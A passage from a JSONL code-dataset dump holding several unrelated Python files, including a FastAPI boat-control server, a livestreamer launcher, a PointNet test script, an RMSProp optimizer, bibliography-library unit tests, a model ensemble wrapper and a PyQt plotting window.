fastapi.responses import HTMLResponse, JSONResponse\nfrom fastapi.staticfiles import StaticFiles\nfrom fastapi.encoders import jsonable_encoder\nfrom pydantic import BaseModel\nimport json\n\nfrom fake_boat import FakeBoat\n\nboat = FakeBoat()\napp = FastAPI()\napp.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n\n\nclass Item(BaseModel):\n speed: int\n angle: int\n led1: bool\n led2: bool\n\n\n@app.get(\"/\")\nasync def root():\n page = \"\"\n with open(\"index.html\") as f:\n page = f.read()\n return HTMLResponse(content=page)\n\n\n@app.post(\"/control\")\nasync def root(item: Item):\n data = item\n boat.set_led(data.led1, 0)\n boat.set_led(data.led2, 1)\n boat.set_speed(data.speed)\n boat.set_angle(data.angle)\n return {\"message\": \"Set: \"+str(boat)}\n\n\n@app.get(\"/telemetry\")\nasync def root():\n response = {\"speed\": boat.get_speed(),\n \"angle\": boat.get_angle(),\n \"led1\": boat.get_led(0),\n \"led2\": boat.get_led(1)}\n print(\"sending telemetry: \", response)\n #return JSONResponse(content=jsonable_encoder(response))\n return HTMLResponse(content=json.dumps(response))\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"569887487","text":"#!python2\n\nimport argparse\nimport logging\nfrom subprocess import Popen\nimport json\nfrom livestreamer import streams as livestreamer_stream\nfrom stream_lib import Streams\nfrom configparser import 
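The `/telemetry` handler in the FastAPI record above returns `HTMLResponse(content=json.dumps(response))`, which serializes correctly but labels the body `text/html`. Returning the dict directly (or a `JSONResponse`) lets FastAPI emit `application/json` with the right headers. A minimal sketch with a stubbed state dict; the names are illustrative, not the record's `FakeBoat` API:

```python
from fastapi import FastAPI

app = FastAPI()
state = {"speed": 0, "angle": 0, "led1": False, "led2": False}


@app.get("/telemetry")
async def telemetry():
    # FastAPI encodes plain dicts as application/json automatically.
    return state
```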
SafeConfigParser, ParsingError\nfrom shutil import copy\nimport webbrowser\nfrom movewindows import WindowsPosition\nimport time\n\n\n# Reading and loading configs\ntry:\n conf = SafeConfigParser()\n conf.read('E:\\code\\stream-check\\config.ini')\n STREAM_LIST_PATH = conf.get('stream_dict', 'path')\n STREAM_BACKUP_PATH = conf.get('stream_dict', 'backup')\n TEXT_PATH = conf.get('massiveadd', 'path')\n LOG_PATH = conf.get('log', 'path')\n FORMATTER = '%(asctime)-15s | %(levelname)-8s \\n %(message)-8s'\n logging.basicConfig(\n filename=LOG_PATH, level=logging.INFO, format=FORMATTER)\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n browser = webbrowser.get('windows-default')\nexcept ParsingError as e:\n print(\"Couldn't parse because {}\".format(e))\n\n\ndef open_dict():\n with open(STREAM_LIST_PATH) as f:\n logging.info('Opening dictionary')\n read_dict = json.load(f)\n stream_dict = Streams(read_dict)\n return stream_dict\n\n\ndef add_streams(url, game):\n stream_dict = open_dict()\n stream_dict.addStream(game.upper(), str(url))\n try:\n copy(STREAM_LIST_PATH, STREAM_BACKUP_PATH)\n logging.info('Backing up stream list at {}'.format(STREAM_BACKUP_PATH))\n except Exception as e:\n logging.error('Backup failed: {}'.format(e))\n with open(STREAM_LIST_PATH, 'w') as f:\n json.dump(stream_dict.streams, f)\n logging.info('Added url: {} \\n category: {}'.format(url, game))\n\n\ndef check_stream(url):\n try:\n if livestreamer_stream(url):\n return True\n else:\n return False\n except Exception as e:\n if args.verbose:\n logging.error('Couldnt open: {} ({})'.format(url, e))\n else:\n logging.error('Couldnt open: {}'.format(url))\n\n\ndef open_livestreamer(stream_urls, quality, verbose, chat, monitor):\n for stream_url in stream_urls:\n if check_stream(stream_url):\n if chat:\n webbrowser.open_new_tab(\n '{}/{}'.format(str(stream_url), 'chat'))\n\n #vod mode, makes possible to skip the time\n try:\n int(str(stream_url).split('/')[-1]) \n Popen(\n 'livestreamer {} {} -Q --player-passthrough=hls'.format(str(stream_url), quality), shell=verbose)\n #normal mode\n except ValueError: \n Popen(\n 'livestreamer {} {} -Q '.format(str(stream_url), quality), shell=verbose)\n\n logging.info('Opening: {} \\n Quality: {} \\n verbose: {}'.format(\n stream_url, quality, verbose))\n\n time.sleep(16)\n windows = WindowsPosition()\n windows.move(monitor)\n\n\ndef massive_add(text):\n with open(text, 'r') as f:\n lines = [line.strip() for line in f.readlines()]\n for line in lines:\n if line == line.upper():\n game = line\n else:\n url = line.split()\n add_streams(''.join(url[1::3]), game)\n\n\ndef main(game=None, quality='source', verbose=True, chat=False, monitor='monitor1'):\n streams = open_dict()\n if game == None:\n for stream in streams:\n open_livestreamer(stream, quality, verbose, chat, monitor)\n else:\n for game_category in game:\n open_livestreamer(\n streams[game_category.upper()], quality, verbose, chat, monitor)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Game streams to open')\n parser.add_argument(\n '--single', '-s', help='opens a single stream', action=\"store\")\n parser.add_argument( \n '--multi', '-m', help=\"open multiple streams\", nargs='*', action=\"store\")\n parser.add_argument(\n '--add', '-a', help=\"add stream to the list URL GAME\", nargs=2, action=\"store\")\n parser.add_argument(\n '-v', '--verbose', help=\"Makes cmd windows appear\", action=\"store_true\")\n parser.add_argument(\n '-c', '--chat', help=\"Opens twitch chat if available\", 
action=\"store_true\")\n parser.add_argument(\n '--quality', '-q', help='Chooses the quality to open streams, default = source', default='source')\n parser.add_argument(\n '--monitor', '-mn', help='Chooses the monitor to open, default = monitor1, n (see movewindows.py)', default='monitor1', action=\"store\")\n args = parser.parse_args()\n verbose = False if args.verbose else True\n chat = True if args.chat else False\n if args.single:\n open_livestreamer(\n [args.single], args.quality, verbose, chat, args.monitor)\n elif args.multi:\n main(args.multi, args.quality, verbose, chat, args.monitor)\n elif args.add:\n add_streams(args.add[0], args.add[1])\n else:\n main()\n","sub_path":"streamcheck-old.py","file_name":"streamcheck-old.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"146283244","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim as optim\nimport torch.utils.data\nimport torchvision.datasets as dset\nimport torchvision.transforms as transforms\nimport torchvision.utils as vutils\nfrom torch.autograd import Variable\nfrom datasets import PartDataset\nfrom pointnet import PointNetDenseCls\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom show3d_balls import *\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--batchSize', type=int, default=1, help='input batch size')\nparser.add_argument('--workers', type=int, help='number of data loading workers', default=0)\nparser.add_argument('--nepoch', type=int, default=30, help='number of epochs to train for')\nparser.add_argument('--outf', type=str, default='seg', help='output folder')\nparser.add_argument('--model', type=str, default= './seg/seg_model_29_0.810.pth', help='model path')\n\n\nopt = parser.parse_args()\nprint (opt)\n\nopt.manualSeed = random.randint(1, 2500) # fix seed\nprint(\"Random Seed: \", opt.manualSeed)\nrandom.seed(opt.manualSeed)\ntorch.manual_seed(opt.manualSeed)\n\nnum_points = 2700\n\ntest_dataset = PartDataset(root = 'shapenetcore_partanno_segmentation_benchmark_v0', npoints=num_points, classification=False, class_choice=['tools'], train=False)\ntestdataloader = torch.utils.data.DataLoader(test_dataset, batch_size=opt.batchSize,\n shuffle=True, num_workers=int(opt.workers))\nprint(len(test_dataset))\n\nnum_classes = 10\nprint('classes', num_classes)\ntry:\n os.makedirs(opt.outf)\nexcept OSError:\n pass\n\nblue = lambda x:'\\033[94m' + x + '\\033[0m'\n\n\nclassifier = PointNetDenseCls(num_points=num_points, k=num_classes)\nclassifier.load_state_dict(torch.load(opt.model))\n# classifier.cuda()\nclassifier.eval()\n\nnum_test_batch = len(test_dataset)/opt.batchSize\n\ncmap = plt.cm.get_cmap(\"hsv\", 5)\ncmap = np.array([cmap(i) for i in range(10)])[:,:3]\n\ncorrect_percents = []\nfor i, data in enumerate(testdataloader, 0):\n points_np, target = data\n points, target = Variable(points_np), Variable(target)\n points = points.transpose(2, 1)\n # points, target = points.cuda(), target.cuda()\n\n pred, _ = classifier(points)\n pred = pred.view(-1, num_classes)\n target = target.view(-1,1)[:,0] - 1\n\n pred_choice = pred.data.max(1)[1]\n correct = pred_choice.eq(target.data).cpu().sum()\n correct_percent = correct.item()/float(list(target.shape)[0])\n correct_percents.append(correct_percent)\n print('[%d/%d] accuracy: 
%f' %(i, num_test_batch, correct_percent))\n\n pred_color = cmap[pred_choice.numpy()[0], :]\n showpoints(points_np, None, pred_color, ballradius=4)\naverage_correct_percent = np.sum(correct_percents) / len(correct_percents)\nprint('Average accuracy: %f' % (correct_percent))\n","sub_path":"test_seg.py","file_name":"test_seg.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"64609516","text":"import numpy as np\nfrom optimizer.Optimizer import Optimizer\n\n\nclass RmsProp(Optimizer):\n def __init__(self, learning_rate=0.01, decay_rate=0.99):\n self.learning_rate = learning_rate\n self.decay_rate = decay_rate\n self.h = None\n\n def update(self, params, grads):\n if self.h is None:\n self.h = {}\n for key, val in params.items():\n self.h[key] = np.zeros_like(val)\n\n for key in params.keys():\n self.h[key] = self.decay_rate * self.h[key] + (1 - self.decay_rate) * grads[key] * grads[key]\n params[key] -= self.learning_rate * grads[key] / (np.sqrt(self.h[key]) + 1e-7)\n","sub_path":"optimizer/RmsProp.py","file_name":"RmsProp.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"327046041","text":"\"\"\"\nUnit tests for publication_objects.py\n\"\"\"\n\n# pylint: disable=no-member, missing-docstring, len-as-condition\nimport logging\n\nimport pytest\n\nfrom bibliom.publication_objects import Paper, Author, Journal, Citation\nfrom bibliom.dbtable import DBTable\nfrom bibliom import exceptions\n\n@pytest.mark.usefixtures('class_manager')\nclass TestPaper():\n \"\"\"\n Unit tests for Paper class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_init')\n new_paper = Paper(manager=self.manager)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(table=paper_table)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n assert new_paper.title == \"A New Paper\"\n assert new_paper.doi == \"10.1231/12312\"\n\n paper = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert paper.title\n \n def test_fetch(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_fetch')\n paper = Paper.fetch(\n manager=self.manager,\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'})\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(doi='10.1016/j.ijhydene.2016.06.178')\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n\n def test_str(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_str')\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n\n assert 
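The `RmsProp.update` method in the optimizer record above keeps a decayed running average `h` of squared gradients and scales each step by `1 / (sqrt(h) + eps)`. Below is a tiny self-contained demo of the same rule minimizing f(x) = x², assuming only numpy:

```python
import numpy as np

learning_rate, decay_rate, eps = 0.01, 0.99, 1e-7
x = np.array([5.0])
h = np.zeros_like(x)

for _ in range(2000):
    grad = 2 * x  # d/dx of x^2
    # Decayed average of squared gradients, as in the record above.
    h = decay_rate * h + (1 - decay_rate) * grad * grad
    # Per-parameter step scaled by the root of that average.
    x -= learning_rate * grad / (np.sqrt(h) + eps)

print(x)  # hovers close to [0.]
```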
str(new_paper) == (\n 'A New Paper (10.1231/12312)'\n )\n\n def test_authors(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_authors')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.authors) == 2\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.authors) == 0\n\n def test_journal(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_journal')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert paper.journal.title == 'ANTIOXIDANTS & REDOX SIGNALING'\n\n def test_cited_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cited_papers')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.cited_papers) == 177\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.cited_papers) == 0\n\n def test_citing_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_citing_papers')\n paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n assert len(paper.citing_papers) == 5\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.citing_papers) == 0\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cite')\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n new_citation = source_paper.cite(target_paper)\n new_citation.save_to_db()\n\n found = False\n for paper in source_paper.cited_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.07.026':\n found = True\n break\n assert found\n\n found = False\n for paper in target_paper.citing_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.06.178':\n found = True\n break\n assert found\n\n new_paper = Paper()\n with pytest.raises(exceptions.DBUnsyncedError):\n new_paper.cite(target_paper)\n with pytest.raises(exceptions.DBUnsyncedError):\n source_paper.cite(new_paper)\n\n with pytest.raises(TypeError):\n source_paper.cite(\"hello\")\n\n@pytest.mark.usefixtures('class_manager')\nclass TestAuthor():\n \"\"\"\n Unit tests for Author class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_init')\n author_table = DBTable.get_table_object('author', self.manager)\n\n new_author = Author(\n manager=self.manager\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Mike'\n }\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name == 'Thicke'\n\n new_author = Author(\n table=author_table,\n row_key='idauthor' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name\n\n def test_str(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_str')\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert str(new_author) == 'Thicke, Michael Lowell 
Ellis'\n\n def test_from_string(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_from_string')\n author_table = DBTable.get_table_object('author', self.manager)\n new_author = Author.from_string(author_table, 'Thicke, Michael Lowell Ellis')\n assert new_author.last_name == 'Thicke'\n assert new_author.given_names == 'Michael Lowell Ellis'\n\n new_author = Author.from_string(author_table, 'IPCC')\n assert new_author.corporate\n assert new_author.last_name == 'IPCC'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_papers')\n author_table = DBTable.get_table_object('author', self.manager)\n\n author = Author(\n table=author_table,\n row_key='idauthor' + author_table.KEY_STR_DELIMITER + '1'\n )\n assert len(author.papers) == 1\n\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert len(new_author.papers) == 0\n\n@pytest.mark.usefixtures('class_manager')\nclass TestJournal():\n \"\"\"\n Unit tests for Journal class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_init')\n journal_table = DBTable.get_table_object('journal', self.manager)\n\n journal = Journal(manager=self.manager)\n assert isinstance(journal, Journal)\n\n journal = Journal(table=journal_table)\n assert isinstance(journal, Journal)\n\n journal = Journal(\n table=journal_table,\n row_key='idjournal' + journal_table.KEY_STR_DELIMITER + '1')\n assert isinstance(journal, Journal)\n assert isinstance(journal.title, str)\n\n new_journal = Journal(\n table=journal_table,\n fields_dict={\n 'title': 'A Journal'\n }\n )\n assert new_journal.title == 'A Journal'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_papers')\n journal_table = DBTable.get_table_object('journal', self.manager)\n\n journal = Journal.fetch(\n table=journal_table,\n where_dict={\n 'issn': '1876-6102'\n }\n )\n assert len(journal.papers) == 148\n\n@pytest.mark.usefixtures('class_manager')\nclass TestCitation():\n \"\"\"\n Unit tests for Citation class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_init')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n citation = Citation(table=citation_table)\n assert isinstance(citation, Citation)\n\n citation = Citation(manager=self.manager)\n assert isinstance(citation, Citation)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n assert isinstance(citation, Citation)\n\n new_citation = Citation(\n table=citation_table,\n fields_dict={\n 'source_id': 100,\n 'target_id': 200\n }\n )\n assert isinstance(new_citation, Citation)\n assert new_citation.source_id == 100\n assert new_citation.target_id == 200\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_cite')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n\n new_citation = Citation(table=citation_table)\n new_citation.cite(source_paper, 
target_paper)\n assert new_citation.source_id == source_paper.idpaper\n assert new_citation.target_id == target_paper.idpaper\n\n def test_source_paper_target_paper(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_source_paper_target_paper')\n citation_table = DBTable.get_table_object('citation', self.manager)\n paper_table = DBTable.get_table_object('paper', self.manager)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n source_paper = citation.source_paper\n assert source_paper.idpaper == 68\n assert source_paper.doi == '10.1140/epja/i2017-12405-4'\n target_paper = citation.target_paper\n assert target_paper.idpaper == 75\n assert target_paper.doi == '10.1088/1674-1137/41/11/113104'\n\n paper_1 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n paper_2 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '2'\n )\n citation = Citation(table=citation_table)\n citation.source_paper = paper_1\n citation.target_paper = paper_2\n assert citation.source_id == 1\n assert citation.target_id == 2\n citation.save_to_db()\n assert paper_2 in paper_1.cited_papers\n assert paper_1 in paper_2.citing_papers\n","sub_path":"tests/test_publication_objects.py","file_name":"test_publication_objects.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"107337914","text":"import numpy as np\nimport pandas as pd\n\nclass MEnsamble:\n    def __init__(self, Model, n, ws, bins, **kwparams):\n        self.n = kwparams.get('n', n)\n        self.Model = kwparams.get('Model', Model)\n        self.ms = None\n        self.idxs = None\n        self.__updateN__(**kwparams)\n        self.ws = kwparams.get('ws', ws)\n        self.bins = kwparams.get('bins', bins)\n\n    def __updateN__(self, **kwparams):\n        self.ms = [self.Model(**kwparams) for i in range(self.n)]\n        self.idxs = [[] for i in range(self.n)]\n\n    def splitDataset(self, y):\n        bres = [(y > (self.bins[i] - 1e-10)) & (y <= self.bins[i + 1]) for i in range(len(self.bins) - 1)]\n        for i in range(self.n):\n            res = []\n            for j, w in enumerate(self.ws):\n                res.append(np.random.choice(\n                    np.where(bres[j])[0],\n                    np.min([w, bres[j].sum()]),\n                    replace=False))\n                # print(bres[j].sum(),w,len(res[-1]))\n            self.idxs[i] = np.hstack(res)\n\n    def fit(self, X, y, splitDataset=True):\n        self.splitDataset(y)\n        for m, idx in zip(self.ms, self.idxs):\n            m.fit(X[idx], y[idx])\n\n    def predict(self, X):\n        yp = [m.predict(X) for m in self.ms]\n        return np.median(yp, axis=0)\n\n    def set_params(self, **params):\n        m_keys = {}\n        for p in params:\n            assert not (hasattr(self, p) and hasattr(self.ms[0], p))\n            if hasattr(self, p):\n                self.__setattr__(p, params[p])\n                if p == 'n':\n                    self.__updateN__()\n            else:\n                m_keys[p] = params[p]\n        for m in self.ms:\n            m.set_params(**m_keys)\n\n\nclass Model_Wrapper(object):\n    def __init__(self, model, columns, X_scaler, Y_scaler):\n        self.model = model\n        self.columns = columns\n\n        self.X_scaler = X_scaler\n\n        self.Y_scaler = Y_scaler\n\n    def predict(self, X):\n        X = X[self.columns]\n\n        Xs = self.X_scaler.transform(X)\n        yp = self.model.predict(Xs)\n\n        ys = self.Y_scaler.transform(yp)\n        y = pd.DataFrame(ys)\n        return y\n\n\nclass NoScale:\n    def transform(self, x, *args, **kwargs):\n        return 
x","sub_path":"aux/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"228336527","text":"from PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QMainWindow, QDockWidget, QTabWidget\nfrom ert_gui.models.connectors.init import CaseSelectorModel\nfrom ert_gui.tools.plot import PlotPanel, DataTypeKeysWidget, CaseSelectionWidget, PlotMetricsWidget, ScaleTracker\nfrom ert_gui.tools.plot.data import PlotDataFetcher\nfrom ert_gui.widgets.util import may_take_a_long_time\n\n\nclass PlotWindow(QMainWindow):\n def __init__(self, parent):\n QMainWindow.__init__(self, parent)\n\n self.setMinimumWidth(750)\n self.setMinimumHeight(500)\n\n self.setWindowTitle(\"Plotting\")\n self.activateWindow()\n\n self.__central_tab = QTabWidget()\n self.setCentralWidget(self.__central_tab)\n\n\n self.__plot_panels = []\n\n self.addPlotPanel(\"Ensemble plot\", \"gui/plots/simple_plot.html\", short_name=\"Plot\")\n self.addPlotPanel(\"Ensemble overview plot\", \"gui/plots/simple_overview_plot.html\", short_name=\"oPlot\")\n self.addPlotPanel(\"Histogram\", \"gui/plots/histogram.html\", short_name=\"Histogram\")\n self.addPlotPanel(\"RFT plot\", \"gui/plots/rft.html\", short_name=\"RFT\")\n self.addPlotPanel(\"RFT overview plot\", \"gui/plots/rft_overview.html\", short_name=\"oRFT\")\n\n self.__data_type_keys_widget = DataTypeKeysWidget()\n self.__data_type_keys_widget.dataTypeKeySelected.connect(self.keySelected)\n self.addDock(\"Data types\", self.__data_type_keys_widget)\n\n current_case = CaseSelectorModel().getCurrentChoice()\n self.__case_selection_widget = CaseSelectionWidget(current_case)\n self.__case_selection_widget.caseSelectionChanged.connect(self.caseSelectionChanged)\n self.addDock(\"Plot case\", self.__case_selection_widget)\n\n self.__plot_metrics_widget = PlotMetricsWidget()\n self.__plot_metrics_widget.plotScalesChanged.connect(self.scalesChanged)\n self.__plot_metrics_widget.reportStepTimeChanged.connect(self.reportStepTimeChanged)\n self.addDock(\"Plot metrics\", self.__plot_metrics_widget)\n\n self.__data_type_key = None\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.__value_scale_tracker = ScaleTracker(\"Value\")\n self.__time_scale_tracker = ScaleTracker(\"Time\")\n self.__depth_scale_tracker = ScaleTracker(\"Depth\")\n\n\n def addPlotPanel(self, name, path, short_name=None):\n if short_name is None:\n short_name = name\n\n plot_panel = PlotPanel(name, short_name, path)\n plot_panel.plotReady.connect(self.plotReady)\n self.__plot_panels.append(plot_panel)\n self.__central_tab.addTab(plot_panel, name)\n\n\n def addDock(self, name, widget, area=Qt.LeftDockWidgetArea, allowed_areas=Qt.AllDockWidgetAreas):\n dock_widget = QDockWidget(name)\n dock_widget.setObjectName(\"%sDock\" % name)\n dock_widget.setWidget(widget)\n dock_widget.setAllowedAreas(allowed_areas)\n dock_widget.setFeatures(QDockWidget.DockWidgetFloatable | QDockWidget.DockWidgetMovable)\n\n self.addDockWidget(area, dock_widget)\n return dock_widget\n\n\n def checkPlotStatus(self):\n for plot_panel in self.__plot_panels:\n if not plot_panel.isReady():\n return False\n\n if len(self.__plot_cases) == 0:\n return False\n\n return True\n\n def plotReady(self):\n if self.checkPlotStatus():\n self.__data_type_keys_widget.selectDefault()\n\n\n def caseSelectionChanged(self):\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.keySelected(self.__data_type_key)\n\n 
def scalesChanged(self):\n value_min = self.__plot_metrics_widget.getValueMin()\n value_max = self.__plot_metrics_widget.getValueMax()\n time_min = self.__plot_metrics_widget.getTimeMin()\n time_max = self.__plot_metrics_widget.getTimeMax()\n depth_min = self.__plot_metrics_widget.getDepthMin()\n depth_max = self.__plot_metrics_widget.getDepthMax()\n\n self.__value_scale_tracker.setScaleValues(self.__data_type_key, value_min, value_max)\n self.__time_scale_tracker.setScaleValues(self.__data_type_key, time_min, time_max)\n self.__depth_scale_tracker.setScaleValues(self.__data_type_key, depth_min, depth_max)\n\n\n for plot_panel in self.__plot_panels:\n plot_panel.setScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n def reportStepTimeChanged(self):\n t = self.__plot_metrics_widget.getSelectedReportStepTime()\n\n for plot_panel in self.__plot_panels:\n plot_panel.setReportStepTime(t)\n\n\n def showOrHidePlotTab(self, plot_panel, is_visible, show_plot):\n plot_panel.setPlotIsVisible(show_plot)\n if show_plot and not is_visible:\n index = self.__plot_panels.index(plot_panel)\n self.__central_tab.insertTab(index, plot_panel, plot_panel.getName())\n elif not show_plot and is_visible:\n index = self.__central_tab.indexOf(plot_panel)\n self.__central_tab.removeTab(index)\n\n @may_take_a_long_time\n def keySelected(self, key):\n self.__data_type_key = str(key)\n\n plot_data_fetcher = PlotDataFetcher()\n for plot_panel in self.__plot_panels:\n visible = self.__central_tab.indexOf(plot_panel) > -1\n\n if plot_data_fetcher.isSummaryKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True, histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isBlockObservationKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(depth=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenKWKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenDataKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n else:\n raise NotImplementedError(\"Key %s not supported.\" % self.__data_type_key)\n\n value_min = self.__value_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n value_max = self.__value_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n time_min = self.__time_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n time_max = self.__time_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n depth_min = self.__depth_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n depth_max = self.__depth_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n\n self.__plot_metrics_widget.updateScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n if self.checkPlotStatus():\n data = plot_data_fetcher.getPlotDataForKeyAndCases(self.__data_type_key, self.__plot_cases)\n data.setParent(self)\n\n for plot_panel in self.__plot_panels:\n plot_panel.setPlotData(data)\n\n","sub_path":"devel/python/python/ert_gui/tools/plot/plot_window.py","file_name":"plot_window.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"278187008","text":"from func import *\n\n\nclass Perceptron:\n def 
